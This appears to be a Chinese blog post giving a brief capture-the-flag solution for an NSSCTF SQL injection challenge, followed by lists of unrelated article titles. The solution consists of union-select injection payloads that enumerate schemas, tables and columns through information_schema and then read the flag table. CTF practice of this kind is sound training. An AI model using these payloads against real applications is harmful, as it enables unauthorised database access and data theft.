NSSCTF 这是什么?SQL !注一下 !

  • 开发
  • 53

开启环境:

 

 直接提示了查询语句,sql注入:

?id=1)))))) union select 1,group_concat(schema_name) from information_schema.schemata–-+

得到数据库

 ?id=1))))))union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘ctftraining’--+

得到ctftraining中的表

 ?id=1))))))union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘ctftraining’--+
爆出字段名

/?id=1))))))union select 1,flag from ctftraining.flag--+
联合查询得到flag值

 

阅读全部

相关推荐

  4. 什么sql的谓词

    2024-01-10 10:16:05       60 阅读

  7. 数据库sql什么

    2024-01-10 10:16:05       56 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-01-10 10:16:05       98 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-01-10 10:16:05       106 阅读

  9. 在Django里面运行非项目文件

    2024-01-10 10:16:05       87 阅读

  19. Python语言-面向对象

    2024-01-10 10:16:05       96 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-01-10 10:16:05       91 阅读

热门阅读

  4. 在C++中,一个变量其作用域与它的内存空间被释放

    2024-01-10 10:16:05       61 阅读

  6. go 的内存布局和分配原理

    2024-01-10 10:16:05       52 阅读

  8. 服务器访问慢怎么办?

    2024-01-10 10:16:05       57 阅读

  18. DataGear专业版 1.0.0 发布,数据可视化分析平台

    2024-01-10 10:16:05       58 阅读

  23. proxySQL+mysql8.0一主双从+springboot配置

    2024-01-10 10:16:05       54 阅读

  24. 63、图片预处理:Resize and Crop

    2024-01-10 10:16:05       62 阅读

  26. @基于大模型的旅游路线推荐方案

    2024-01-10 10:16:05       59 阅读